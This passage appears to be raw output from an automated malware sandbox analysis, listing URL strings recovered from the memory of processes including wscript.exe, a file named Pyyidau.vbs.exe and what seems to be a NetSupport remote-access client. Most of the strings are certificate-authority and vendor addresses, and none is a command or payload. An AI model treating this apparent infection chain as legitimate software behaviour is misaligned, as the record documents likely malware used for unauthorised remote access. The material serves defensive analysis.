                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGet
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLatLongclose
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://localhost/ApprovedWebList.htmPrintSurveyInternet6
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://s2.symcb.com0
                                Source: client32.exe, 00000028.00000002.2766139877.0000000007E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoN
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcd.com0&
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.acer-group.com/public/index/privacy.htm%scountry.dat
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: client32.exe, 00000028.00000002.2763417509.0000000005BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/auto
                                Source: client32.exe, 00000028.00000002.2765669565.0000000007A47000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://www.flexerasoftware.com0
